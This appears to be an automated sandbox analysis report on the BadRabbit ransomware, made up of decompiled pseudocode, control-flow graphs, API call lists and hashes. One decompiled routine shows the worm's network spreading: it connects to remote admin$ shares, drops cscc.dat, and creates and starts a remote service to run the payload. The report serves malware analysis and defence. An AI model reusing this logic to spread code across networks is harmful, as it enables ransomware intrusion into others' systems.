                                                                                                                                                              0x011029d9
                                                                                                                                                              0x011029d9
                                                                                                                                                              0x011029dc
                                                                                                                                                              0x011029dc
                                                                                                                                                              0x011029dc
                                                                                                                                                              0x011029de
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x011029e0
                                                                                                                                                              0x011029e0
                                                                                                                                                              0x011029e4
                                                                                                                                                              0x011029e7
                                                                                                                                                              0x011029e9
                                                                                                                                                              0x011029eb
                                                                                                                                                              0x011029ee
                                                                                                                                                              0x011029f1
                                                                                                                                                              0x011029f3
                                                                                                                                                              0x011029f6
                                                                                                                                                              0x011029f7
                                                                                                                                                              0x011029fa
                                                                                                                                                              0x011029fd
                                                                                                                                                              0x01102a00
                                                                                                                                                              0x01102a03
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01102a05
                                                                                                                                                              0x01102a05
                                                                                                                                                              0x01102a05
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01102a05
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01102a44
                                                                                                                                                              0x01102a44
                                                                                                                                                              0x01102a46
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01102a49
                                                                                                                                                              0x01102a49
                                                                                                                                                              0x01102a4b
                                                                                                                                                              0x01102a4c
                                                                                                                                                              0x01102a4c
                                                                                                                                                              0x01102a4f
                                                                                                                                                              0x01102a4f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x011017be
                                                                                                                                                              0x01101dd0
                                                                                                                                                              0x01101dd0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01101dd0
                                                                                                                                                              0x01101fcd
                                                                                                                                                              0x01101fcf
                                                                                                                                                              0x01101fd5
                                                                                                                                                              0x01101fd9
                                                                                                                                                              0x01101fde
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01101fe4
                                                                                                                                                              0x01101feb
                                                                                                                                                              0x01101ff0
                                                                                                                                                              0x01101ff3
                                                                                                                                                              0x01101ff9
                                                                                                                                                              0x01101ffc
                                                                                                                                                              0x01101ffe
                                                                                                                                                              0x01102001
                                                                                                                                                              0x01102004
                                                                                                                                                              0x01102007
                                                                                                                                                              0x0110200a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0110200a
                                                                                                                                                              0x01101f92
                                                                                                                                                              0x01101f92
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01101f92

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.403020960.0000000001101000.00000020.00000001.01000000.00000011.sdmp, Offset: 01100000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.402933054.0000000001100000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403094108.0000000001104000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403104016.0000000001109000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_16_2_1100000_Endermanch@BadRabbit.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: Oet$8 Oet$8 Oet$invalid stored block lengths
                                                                                                                                                              • API String ID: 3510742995-3427597846
                                                                                                                                                              • Opcode ID: cad37aa4dcb532d2866ff53f14b1a443b2fe6a7b58a250d056804dedb83f3d37
                                                                                                                                                              • Instruction ID: 398b640dda561117cd69918a664c98341f8ab5e3230f36ce0800474267568556
                                                                                                                                                              • Opcode Fuzzy Hash: cad37aa4dcb532d2866ff53f14b1a443b2fe6a7b58a250d056804dedb83f3d37
                                                                                                                                                              • Instruction Fuzzy Hash: B2413971E00209DFDF2ACF69C4845ADBBF2FF88310B14856AD955E7685EB749A80CF41
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 842 1102dcb-1102ddf 843 1102e01-1102e04 842->843 844 1102de1-1102df8 842->844 845 1102e14-1102e1f 843->845 846 1102e06-1102e11 843->846 844->843 850 1102dfa-1102dfc 844->850 847 1102e21-1102e30 memcpy 845->847 848 1102e39-1102e56 memcpy 845->848 846->845 851 1102e34-1102e37 847->851 852 1102e58-1102e6d memcpy 848->852 853 1102e6f-1102e78 848->853 854 1102e8c-1102e90 850->854 855 1102e87 851->855 852->851 856 1102e7a 853->856 857 1102e7e-1102e83 853->857 859 1102e8a 855->859 856->857 858 1102e85 857->858 857->859 858->855 859->854
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E01102DCB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                              				int _t39;
                                                                                                                                                              				int _t41;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                              				int _t53;
                                                                                                                                                              				int _t54;
                                                                                                                                                              				intOrPtr _t57;
                                                                                                                                                              				int _t60;
                                                                                                                                                              				int _t62;
                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              
                                                                                                                                                              				_t57 = _a4;
                                                                                                                                                              				_t64 =  *((intOrPtr*)(_t57 + 0x1c));
                                                                                                                                                              				if( *(_t64 + 0x34) != 0) {
                                                                                                                                                              					L3:
                                                                                                                                                              					if( *(_t64 + 0x28) == 0) {
                                                                                                                                                              						 *(_t64 + 0x28) = 1 <<  *(_t64 + 0x24);
                                                                                                                                                              						 *(_t64 + 0x30) = 0;
                                                                                                                                                              						 *(_t64 + 0x2c) = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t60 =  *(_t64 + 0x28);
                                                                                                                                                              					_t52 = _a12;
                                                                                                                                                              					_t34 = _a8;
                                                                                                                                                              					if(_t52 < _t60) {
                                                                                                                                                              						_t62 =  >  ? _t52 : _t60 -  *(_t64 + 0x30);
                                                                                                                                                              						memcpy( *(_t64 + 0x34) +  *(_t64 + 0x30), _t34 - _t52, _t62);
                                                                                                                                                              						_t53 = _t52 - _t62;
                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                              							 *(_t64 + 0x30) =  *(_t64 + 0x30) + _t62;
                                                                                                                                                              							_t54 =  *(_t64 + 0x28);
                                                                                                                                                              							if( *(_t64 + 0x30) == _t54) {
                                                                                                                                                              								 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                                                                              							}
                                                                                                                                                              							_t39 =  *(_t64 + 0x2c);
                                                                                                                                                              							if(_t39 >= _t54) {
                                                                                                                                                              								goto L15;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t41 = _t39 + _t62;
                                                                                                                                                              								goto L14;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						memcpy( *(_t64 + 0x34), _a8 - _t53, _t53);
                                                                                                                                                              						 *(_t64 + 0x30) = _t53;
                                                                                                                                                              						goto L7;
                                                                                                                                                              					} else {
                                                                                                                                                              						memcpy( *(_t64 + 0x34), _t34 - _t60, _t60);
                                                                                                                                                              						 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                                                                              						L7:
                                                                                                                                                              						_t41 =  *(_t64 + 0x28);
                                                                                                                                                              						L14:
                                                                                                                                                              						 *(_t64 + 0x2c) = _t41;
                                                                                                                                                              						L15:
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t49 =  *((intOrPtr*)(_t57 + 0x20))( *((intOrPtr*)(_t57 + 0x28)), 1 <<  *(_t64 + 0x24), 1);
                                                                                                                                                              				_t65 = _t65 + 0xc;
                                                                                                                                                              				 *(_t64 + 0x34) = 1;
                                                                                                                                                              				if(_t49 != 0) {
                                                                                                                                                              					goto L3;
                                                                                                                                                              				}
                                                                                                                                                              				return 1;
                                                                                                                                                              			}















                                                                                                                                                              0x01102dce
                                                                                                                                                              0x01102dd4
                                                                                                                                                              0x01102ddf
                                                                                                                                                              0x01102e01
                                                                                                                                                              0x01102e04
                                                                                                                                                              0x01102e0b
                                                                                                                                                              0x01102e0e
                                                                                                                                                              0x01102e11
                                                                                                                                                              0x01102e11
                                                                                                                                                              0x01102e14
                                                                                                                                                              0x01102e17
                                                                                                                                                              0x01102e1a
                                                                                                                                                              0x01102e1f
                                                                                                                                                              0x01102e3e
                                                                                                                                                              0x01102e4c
                                                                                                                                                              0x01102e54
                                                                                                                                                              0x01102e56
                                                                                                                                                              0x01102e6f
                                                                                                                                                              0x01102e72
                                                                                                                                                              0x01102e78
                                                                                                                                                              0x01102e7a
                                                                                                                                                              0x01102e7a
                                                                                                                                                              0x01102e7e
                                                                                                                                                              0x01102e83
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01102e85
                                                                                                                                                              0x01102e85
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01102e85
                                                                                                                                                              0x01102e83
                                                                                                                                                              0x01102e62
                                                                                                                                                              0x01102e6a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01102e21
                                                                                                                                                              0x01102e28
                                                                                                                                                              0x01102e30
                                                                                                                                                              0x01102e34
                                                                                                                                                              0x01102e34
                                                                                                                                                              0x01102e87
                                                                                                                                                              0x01102e87
                                                                                                                                                              0x01102e8a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x01102e8a
                                                                                                                                                              0x01102e1f
                                                                                                                                                              0x01102ded
                                                                                                                                                              0x01102df0
                                                                                                                                                              0x01102df3
                                                                                                                                                              0x01102df8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000010.00000002.403020960.0000000001101000.00000020.00000001.01000000.00000011.sdmp, Offset: 01100000, based on PE: true
                                                                                                                                                              • Associated: 00000010.00000002.402933054.0000000001100000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403094108.0000000001104000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              • Associated: 00000010.00000002.403104016.0000000001109000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_16_2_1100000_Endermanch@BadRabbit.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: 8 Oet
                                                                                                                                                              • API String ID: 3510742995-3278195550
                                                                                                                                                              • Opcode ID: 44921833c22fa8d99f2d9e117e90f1afde499ff961fd9a67a9b6ee16f76bb84c
                                                                                                                                                              • Instruction ID: 8dd42474bb7f610369848269d254becb9781552ab2e3daf8e25ee86493f7c4c3
                                                                                                                                                              • Opcode Fuzzy Hash: 44921833c22fa8d99f2d9e117e90f1afde499ff961fd9a67a9b6ee16f76bb84c
                                                                                                                                                              • Instruction Fuzzy Hash: 45214DB2A10B019FC7698F29C988963B7E9FF987147441A2DE88A87A40D3B1FC44CF50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 62 4e29534-4e2955a call 4e2a760 65 4e29560-4e29604 wsprintfW call 4e288d3 wsprintfW * 2 PathFindExtensionW 62->65 66 4e2985f 62->66 72 4e29606-4e29608 65->72 73 4e2960b-4e29625 wsprintfW 65->73 68 4e29867-4e2986c 66->68 70 4e29874-4e29888 SetLastError 68->70 71 4e2986e-4e29872 68->71 71->70 72->73 74 4e2962a-4e29651 WNetAddConnection2W PathFileExistsW 73->74 75 4e29653-4e29669 GetLastError call 4e287e7 74->75 76 4e296c8-4e296d0 74->76 79 4e2966e-4e29672 75->79 77 4e29844-4e29849 76->77 77->68 80 4e2984b-4e2985d WNetCancelConnection2W 77->80 81 4e29674-4e2967d GetLastError 79->81 82 4e296d5-4e296d8 79->82 80->68 81->77 85 4e29683-4e29686 81->85 83 4e296f4-4e29720 call 4e2944f OpenSCManagerW 82->83 84 4e296da-4e296dd 82->84 93 4e29726-4e2978f memset GetSystemTimeAsFileTime wsprintfW CreateServiceW 83->93 94 4e2982a-4e2982c GetLastError 83->94 84->83 86 4e296df-4e296ea call 4e268b5 84->86 85->77 88 4e2968c-4e2968f 85->88 86->83 88->77 91 4e29695-4e2969d 88->91 91->77 95 4e296a3-4e296a7 91->95 98 4e29791-4e297a4 StartServiceW 93->98 99 4e29809-4e29814 GetLastError 93->99 97 4e29830-4e29834 94->97 95->68 96 4e296ad-4e296c3 WNetCancelConnection2W 95->96 96->74 97->77 102 4e29836-4e2983e DeleteFileW 97->102 103 4e297c2-4e297c7 98->103 104 4e297a6-4e297b1 GetLastError 98->104 100 4e29816 99->100 101 4e2981e-4e29828 CloseServiceHandle 99->101 100->101 101->97 102->77 105 4e297cc-4e297dd QueryServiceStatus 103->105 106 4e297b3-4e297b8 104->106 107 4e297ba 104->107 108 4e297f3-4e29807 DeleteService CloseServiceHandle 105->108 109 4e297df-4e297e4 105->109 106->107 106->108 107->103 108->101 109->108 110 4e297e6-4e297f1 Sleep 109->110 110->105 110->108
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E29534(int _a4, short* _a8, int _a12, short** _a16, long _a32, int _a36, void _a40, int _a44, void* _a48, struct _FILETIME _a52, void* _a56, struct _NETRESOURCE _a60, struct _SERVICE_STATUS _a100, intOrPtr _a104, short _a120, void _a122, short _a128, short _a152, char _a160, short _a184, char _a676, char _a680, char _a684, short _a1204, short _a1216, short _a1224, short _a3244, short _a3272, short _a5300, short _a5308, char _a7368, short _a7376) {
                                                                                                                                                              				int _v0;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				short** _t78;
                                                                                                                                                              				WCHAR* _t96;
                                                                                                                                                              				int _t100;
                                                                                                                                                              				int _t102;
                                                                                                                                                              				void* _t107;
                                                                                                                                                              				void* _t111;
                                                                                                                                                              				void* _t123;
                                                                                                                                                              				long _t124;
                                                                                                                                                              				int _t126;
                                                                                                                                                              				long _t131;
                                                                                                                                                              				long _t133;
                                                                                                                                                              				int _t137;
                                                                                                                                                              				signed int _t143;
                                                                                                                                                              				WCHAR* _t151;
                                                                                                                                                              				void* _t153;
                                                                                                                                                              
                                                                                                                                                              				E04E2A760(0x11cac);
                                                                                                                                                              				_t137 = _a4;
                                                                                                                                                              				_a4 = 0;
                                                                                                                                                              				_v0 = 0;
                                                                                                                                                              				_a12 = 0;
                                                                                                                                                              				if(_t137 == 0) {
                                                                                                                                                              					_v0 = 0x57;
                                                                                                                                                              					goto L36;
                                                                                                                                                              				} else {
                                                                                                                                                              					_a152 = 0;
                                                                                                                                                              					wsprintfW( &_a152, L"\\\\%s\\admin$", _t137);
                                                                                                                                                              					_a36 = 0;
                                                                                                                                                              					_t143 = 7;
                                                                                                                                                              					memset( &_a40, 0, _t143 << 2);
                                                                                                                                                              					_a56 =  &_a160;
                                                                                                                                                              					_a40 = 1;
                                                                                                                                                              					E04E288D3( &_a680);
                                                                                                                                                              					_t151 = L"\\\\%ws\\admin$\\%ws";
                                                                                                                                                              					wsprintfW( &_a3244, _t151, _t137,  &_a676);
                                                                                                                                                              					_a5300 = 0;
                                                                                                                                                              					_a1204 = 0;
                                                                                                                                                              					wsprintfW( &_a5300, _t151, _t137,  &_a684);
                                                                                                                                                              					_t96 = PathFindExtensionW( &_a5308);
                                                                                                                                                              					if(_t96 != 0) {
                                                                                                                                                              						 *_t96 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					wsprintfW( &_a1216, _t151, _t137, L"cscc.dat");
                                                                                                                                                              					_a40 = _a40 & 0x00000000;
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_t100 = WNetAddConnection2W( &_a60, _a12, _a8, 0); // executed
                                                                                                                                                              						_a44 = _t100;
                                                                                                                                                              						_t102 = PathFileExistsW( &_a1224); // executed
                                                                                                                                                              						if(_t102 != 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						GetLastError();
                                                                                                                                                              						_t107 = E04E287E7( *0x4e37b94,  &_a3272,  *0x4e33984); // executed
                                                                                                                                                              						if(_t107 != 0) {
                                                                                                                                                              							if(_a8 != 0 && _a12 != 0) {
                                                                                                                                                              								E04E268B5(_a8, _a12);
                                                                                                                                                              								 *0x4e33010 = 1;
                                                                                                                                                              							}
                                                                                                                                                              							_a7368 = 0;
                                                                                                                                                              							E04E2944F( &_a7368);
                                                                                                                                                              							_t111 = OpenSCManagerW(_a4, 0, 0xf003f);
                                                                                                                                                              							_a44 = _t111;
                                                                                                                                                              							if(_t111 == 0) {
                                                                                                                                                              								_a32 = GetLastError();
                                                                                                                                                              								goto L31;
                                                                                                                                                              							} else {
                                                                                                                                                              								_a120 = 0;
                                                                                                                                                              								memset( &_a122, 0, 0x3e);
                                                                                                                                                              								GetSystemTimeAsFileTime( &_a52);
                                                                                                                                                              								wsprintfW( &_a120, L"%08X%08X", _a56, _a52.dwLowDateTime);
                                                                                                                                                              								_t123 = CreateServiceW(_a56,  &_a128, 0, 0xf01ff, 0x10, 3, 0,  &_a7376, 0, 0, 0, 0, 0);
                                                                                                                                                              								_a48 = _t123;
                                                                                                                                                              								if(_t123 == 0) {
                                                                                                                                                              									_t124 = GetLastError();
                                                                                                                                                              									_a40 = _t124;
                                                                                                                                                              									if(_t124 == 0x431) {
                                                                                                                                                              										_a44 = 1;
                                                                                                                                                              									}
                                                                                                                                                              									L29:
                                                                                                                                                              									CloseServiceHandle(_a56);
                                                                                                                                                              									L31:
                                                                                                                                                              									if(_a36 == 0) {
                                                                                                                                                              										DeleteFileW( &_a3272);
                                                                                                                                                              									}
                                                                                                                                                              									L33:
                                                                                                                                                              									if(_a44 == 0) {
                                                                                                                                                              										WNetCancelConnection2W( &_a184, 0, 1);
                                                                                                                                                              									}
                                                                                                                                                              									L36:
                                                                                                                                                              									_t78 = _a16;
                                                                                                                                                              									if(_t78 != 0) {
                                                                                                                                                              										 *_t78 = _a12;
                                                                                                                                                              									}
                                                                                                                                                              									SetLastError(_v0);
                                                                                                                                                              									return _a4;
                                                                                                                                                              								}
                                                                                                                                                              								_a40 = 0;
                                                                                                                                                              								_t126 = StartServiceW(_t123, 0, 0);
                                                                                                                                                              								_a44 = _t126;
                                                                                                                                                              								if(_t126 != 0) {
                                                                                                                                                              									L22:
                                                                                                                                                              									_t153 = 0xea60;
                                                                                                                                                              									while(QueryServiceStatus(_a48,  &_a100) != 0 && _a104 != 1) {
                                                                                                                                                              										Sleep(0x1388);
                                                                                                                                                              										_t153 = _t153 - 0x1388;
                                                                                                                                                              										if(_t153 > 0) {
                                                                                                                                                              											continue;
                                                                                                                                                              										}
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									L26:
                                                                                                                                                              									DeleteService(_a48);
                                                                                                                                                              									CloseServiceHandle(_a48);
                                                                                                                                                              									goto L29;
                                                                                                                                                              								}
                                                                                                                                                              								_t131 = GetLastError();
                                                                                                                                                              								_a40 = _t131;
                                                                                                                                                              								if(_t131 == 0x41d || _t131 == 0x420) {
                                                                                                                                                              									_a44 = 1;
                                                                                                                                                              									goto L22;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L26;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t133 = GetLastError();
                                                                                                                                                              						_a32 = _t133;
                                                                                                                                                              						if(_t133 == 0x50 || _t133 == 0x35 || _t133 == 0x43 || _a44 != 0x4c3) {
                                                                                                                                                              							goto L33;
                                                                                                                                                              						} else {
                                                                                                                                                              							if(_a40 != 0) {
                                                                                                                                                              								goto L36;
                                                                                                                                                              							}
                                                                                                                                                              							WNetCancelConnection2W( &_a184, 0, 1);
                                                                                                                                                              							_a40 = 1;
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_a36 = 1;
                                                                                                                                                              					goto L33;
                                                                                                                                                              				}
                                                                                                                                                              			}




















                                                                                                                                                              0x04e2953f
                                                                                                                                                              0x04e29545
                                                                                                                                                              0x04e2954c
                                                                                                                                                              0x04e29550
                                                                                                                                                              0x04e29554
                                                                                                                                                              0x04e2955a
                                                                                                                                                              0x04e2985f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29560
                                                                                                                                                              0x04e29569
                                                                                                                                                              0x04e2957e
                                                                                                                                                              0x04e29585
                                                                                                                                                              0x04e2958b
                                                                                                                                                              0x04e29590
                                                                                                                                                              0x04e29599
                                                                                                                                                              0x04e295a5
                                                                                                                                                              0x04e295ad
                                                                                                                                                              0x04e295bb
                                                                                                                                                              0x04e295c9
                                                                                                                                                              0x04e295cd
                                                                                                                                                              0x04e295d5
                                                                                                                                                              0x04e295ef
                                                                                                                                                              0x04e295fc
                                                                                                                                                              0x04e29604
                                                                                                                                                              0x04e29608
                                                                                                                                                              0x04e29608
                                                                                                                                                              0x04e2961a
                                                                                                                                                              0x04e29625
                                                                                                                                                              0x04e2962a
                                                                                                                                                              0x04e29637
                                                                                                                                                              0x04e2963d
                                                                                                                                                              0x04e29649
                                                                                                                                                              0x04e29651
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29653
                                                                                                                                                              0x04e29669
                                                                                                                                                              0x04e29672
                                                                                                                                                              0x04e296d8
                                                                                                                                                              0x04e296e5
                                                                                                                                                              0x04e296ea
                                                                                                                                                              0x04e296ea
                                                                                                                                                              0x04e296f6
                                                                                                                                                              0x04e29706
                                                                                                                                                              0x04e29714
                                                                                                                                                              0x04e2971a
                                                                                                                                                              0x04e29720
                                                                                                                                                              0x04e2982c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29726
                                                                                                                                                              0x04e2972a
                                                                                                                                                              0x04e29735
                                                                                                                                                              0x04e29742
                                                                                                                                                              0x04e2975a
                                                                                                                                                              0x04e29783
                                                                                                                                                              0x04e29789
                                                                                                                                                              0x04e2978f
                                                                                                                                                              0x04e29809
                                                                                                                                                              0x04e2980b
                                                                                                                                                              0x04e29814
                                                                                                                                                              0x04e29816
                                                                                                                                                              0x04e29816
                                                                                                                                                              0x04e2981e
                                                                                                                                                              0x04e29822
                                                                                                                                                              0x04e29830
                                                                                                                                                              0x04e29834
                                                                                                                                                              0x04e2983e
                                                                                                                                                              0x04e2983e
                                                                                                                                                              0x04e29844
                                                                                                                                                              0x04e29849
                                                                                                                                                              0x04e29857
                                                                                                                                                              0x04e29857
                                                                                                                                                              0x04e29867
                                                                                                                                                              0x04e29867
                                                                                                                                                              0x04e2986c
                                                                                                                                                              0x04e29872
                                                                                                                                                              0x04e29872
                                                                                                                                                              0x04e29878
                                                                                                                                                              0x04e29888
                                                                                                                                                              0x04e29888
                                                                                                                                                              0x04e29794
                                                                                                                                                              0x04e29798
                                                                                                                                                              0x04e2979e
                                                                                                                                                              0x04e297a4
                                                                                                                                                              0x04e297c2
                                                                                                                                                              0x04e297c2
                                                                                                                                                              0x04e297cc
                                                                                                                                                              0x04e297e7
                                                                                                                                                              0x04e297ed
                                                                                                                                                              0x04e297f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e297f1
                                                                                                                                                              0x04e297f3
                                                                                                                                                              0x04e297f7
                                                                                                                                                              0x04e29801
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29801
                                                                                                                                                              0x04e297a6
                                                                                                                                                              0x04e297a8
                                                                                                                                                              0x04e297b1
                                                                                                                                                              0x04e297ba
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e297b1
                                                                                                                                                              0x04e29720
                                                                                                                                                              0x04e29674
                                                                                                                                                              0x04e29676
                                                                                                                                                              0x04e2967d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e296a3
                                                                                                                                                              0x04e296a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e296b9
                                                                                                                                                              0x04e296bf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e296bf
                                                                                                                                                              0x04e2967d
                                                                                                                                                              0x04e296c8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e296c8

                                                                                                                                                              APIs
                                                                                                                                                              • wsprintfW.USER32 ref: 04E2957E
                                                                                                                                                                • Part of subcall function 04E288D3: PathFindFileNameW.SHLWAPI(04E37BC8,76B5C0B0,?,04E295B2), ref: 04E288E3
                                                                                                                                                              • wsprintfW.USER32 ref: 04E295C9
                                                                                                                                                              • wsprintfW.USER32 ref: 04E295EF
                                                                                                                                                              • PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 04E295FC
                                                                                                                                                              • wsprintfW.USER32 ref: 04E2961A
                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04E29637
                                                                                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 04E29649
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E29653
                                                                                                                                                              • GetLastError.KERNEL32(?), ref: 04E29674
                                                                                                                                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04E296B9
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 04E29714
                                                                                                                                                              • memset.MSVCRT ref: 04E29735
                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04E29742
                                                                                                                                                              • wsprintfW.USER32 ref: 04E2975A
                                                                                                                                                              • CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 04E29783
                                                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04E29798
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E297A6
                                                                                                                                                              • QueryServiceStatus.ADVAPI32(?,?), ref: 04E297D5
                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 04E297E7
                                                                                                                                                              • DeleteService.ADVAPI32(?), ref: 04E297F7
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(?), ref: 04E29801
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E29809
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(?), ref: 04E29822
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E2982A
                                                                                                                                                                • Part of subcall function 04E268B5: GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 04E268EB
                                                                                                                                                                • Part of subcall function 04E268B5: HeapAlloc.KERNEL32(00000000), ref: 04E268F4
                                                                                                                                                                • Part of subcall function 04E268B5: memcpy.MSVCRT ref: 04E26921
                                                                                                                                                                • Part of subcall function 04E268B5: GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 04E26946
                                                                                                                                                                • Part of subcall function 04E268B5: HeapAlloc.KERNEL32(00000000), ref: 04E26949
                                                                                                                                                                • Part of subcall function 04E268B5: memcpy.MSVCRT ref: 04E26978
                                                                                                                                                                • Part of subcall function 04E268B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04E26995
                                                                                                                                                                • Part of subcall function 04E268B5: HeapFree.KERNEL32(00000000), ref: 04E26998
                                                                                                                                                                • Part of subcall function 04E268B5: GetProcessHeap.KERNEL32(00000000,?), ref: 04E2699F
                                                                                                                                                                • Part of subcall function 04E268B5: HeapFree.KERNEL32(00000000), ref: 04E269A2
                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 04E2983E
                                                                                                                                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04E29857
                                                                                                                                                              • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04E2A0AD,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000024,Function_00006AA8), ref: 04E29878
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
                                                                                                                                                              • String ID: %08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
                                                                                                                                                              • API String ID: 719309661-1529897384
                                                                                                                                                              • Opcode ID: ca516239176d37885ab1e6ece90b5844561c09da4b46744f1edfb35465a1967b
